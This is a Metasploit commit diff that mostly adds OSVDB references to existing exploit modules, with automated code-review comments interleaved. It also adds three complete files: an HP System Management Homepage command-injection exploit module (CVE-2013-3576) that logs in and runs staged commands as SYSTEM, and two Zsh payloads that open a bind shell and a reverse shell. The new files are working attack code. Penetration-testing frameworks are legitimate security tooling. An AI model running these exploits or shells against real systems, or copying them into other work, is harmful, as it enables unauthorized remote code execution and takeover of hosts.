bug/bundler_fix
jvazquez-r7 2013-06-20 17:18:42 -05:00
commit 785639148c
16 changed files with 322 additions and 17 deletions


@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2013-0422' ],
[ 'OSVDB', '89059' ],
[ 'US-CERT-VU', '625617' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],


@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '77492' ],
[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],


@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ],
[ 'OSVDB', '94441' ],
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
],
'Payload' =>
{


@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ],
[ 'OSVDB', '78480' ],
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
],
'Privileged' => false,
'Payload' =>


@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
[ 'OSVDB', '64171' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
],


@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '64171' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
],


@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['EDB', '20422'],
['BID', '55399']
[ 'OSVDB', '85509' ],
[ 'EDB', '20422 '],
[ 'BID', '55399 ']
],
'Payload' =>
{
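Review bot: The new EDB and BID entries that replace `['EDB', '20422']` and `['BID', '55399']` carry a trailing space inside the identifier string (`'20422 '`, `'55399 '`), so the whitespace becomes part of the reference id and of any URL the framework builds from it. They should read `[ 'EDB', '20422' ],` and `[ 'BID', '55399' ]`. The enclosing initialize call starts and ends outside the hunk.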


@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote
],
'References' =>
[
['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
['CVE', '2013-0209'],
['URL', 'http://www.sec-1.com/blog/?p=402'],
['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
[ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate)
[ 'CVE', '2013-0209' ],
[ 'OSVDB', '89322' ],
[ 'URL', 'http://www.sec-1.com/blog/?p=402' ],
[ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ]
],
'Arch' => ARCH_CMD,
'Payload' =>


@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
'References' =>
[
[ 'CVE', '2012-5159' ],
[ 'OSVDB', '85739' ],
[ 'EDB', '21834' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
],
'Privileged' => false,
'Payload' =>
{


@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0156'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
[ 'CVE', '2013-0156' ],
[ 'OSVDB', '89026' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,


@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
#['OSVDB', ''],
#['EDB', ''],
[ 'OSVDB', '85446' ],
[ 'EDB', '20500' ],
[ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ]
],
'Payload' =>
{


@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['CVE', '2011-3230'],
['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
['URL', 'http://support.apple.com/kb/HT5000']
[ 'CVE', '2011-3230' ],
[ 'OSVDB', '76389' ],
[ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ],
[ 'URL', 'http://support.apple.com/kb/HT5000' ]
],
'Payload' =>
{


@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local
'References' =>
[
[ 'CVE', '2012-3485' ],
[ 'OSVDB', '84706' ],
[ 'EDB', '20443' ],
[ 'URL', 'http://blog.zx2c4.com/791' ]
],


@ -0,0 +1,178 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP System Management Homepage. By
supplying a specially crafted HTTP request, it is possible to control the
'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
which will be used in a exec() function. This results in arbitrary code execution
under the context of SYSTEM. Please note: In order for the exploit to work, the
victim must enable the 'tftp' command, which is the case by default for systems
such as Windows XP, 2003, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange',
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2013-3576'],
['OSVDB', '94191'],
['US-CERT-VU', '735364']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jun 11 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
], self.class)
end
def peer
"#{rhost}:#{rport}"
end
def check
cookie = ''
if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
cookie = login
if cookie.empty?
print_error("#{peer} - Login failed")
return Exploit::CheckCode::Safe
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
sig = Rex::Text.rand_text_alpha(10)
cmd = Rex::Text.uri_encode("echo #{sig}")
uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
req_opts = {}
req_opts['uri'] = uri
if not cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
end
res = send_request_raw(req_opts)
if not res
print_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager({ :temp => '.'})
end
def execute_command(cmd, opts={})
# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
req_opts = {}
req_opts['uri'] = uri
if not @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
print_status("#{peer} - Executing: #{cmd}")
res = send_request_raw(req_opts)
end
def exploit
@cookie = ''
if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
@cookie = login
if @cookie.empty?
fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
setup_stager
end
end
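Review bot: In login, `res.headers['Set-Cookie'].scan(...)` is called without guarding for a missing header, so a response that reports `CpqElm-Login: success` but carries no Set-Cookie raises NoMethodError on nil instead of returning the empty cookie the callers in check and exploit test for; `cookie = res.headers['Set-Cookie'].to_s.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''` keeps the existing contract. In execute_command the local `res` is assigned from send_request_raw and never read, and unlike check it does not report a nil (timed-out) response; either drop the assignment or check the result as check does. The `if not ... and not ...` credential test is duplicated verbatim in check and exploit and would read better as one private predicate method using `&&` and `!`.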


@ -0,0 +1,62 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit4
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via Zsh)',
'Description' => %q{
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
often available, please be aware it isn't usually installed by default.
},
'Author' =>
[
'Doug Prostko <dougtko[at]gmail.com>'
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'zsh',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
cmd = "zmodload zsh/net/tcp;"
cmd << "ztcp -l #{datastore['LPORT']};"
cmd << "ztcp -a $REPLY;"
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
cmd << "ztcp -c"
cmd
end
end
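Review bot: generate uses an explicit `return` for its single expression; Ruby's implicit return makes `super + command_string` sufficient, and the same applies to generate in the reverse-TCP variant in the next file section. The two new payload files also differ in form for the same structure: 'Author' is an array here but a bare string in the reverse variant, and the header comments on generate and command_string appear only here; picking one form for both would keep them consistent. command_string interpolates `datastore['LPORT']` directly into the shell string with no validation visible in this file; a short comment stating where the value is expected to be validated would help the next reader.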


@ -0,0 +1,48 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via Zsh)',
'Description' => %q{
Connect back and create a command shell via Zsh. Note: Although Zsh is often
available, please be aware it isn't usually installed by default.
},
'Author' => 'Doug Prostko <dougtko[at]gmail.com>',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'zsh',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
def generate
return super + command_string
end
def command_string
cmd = "zmodload zsh/net/tcp;"
cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
cmd << "ztcp -c"
cmd
end
end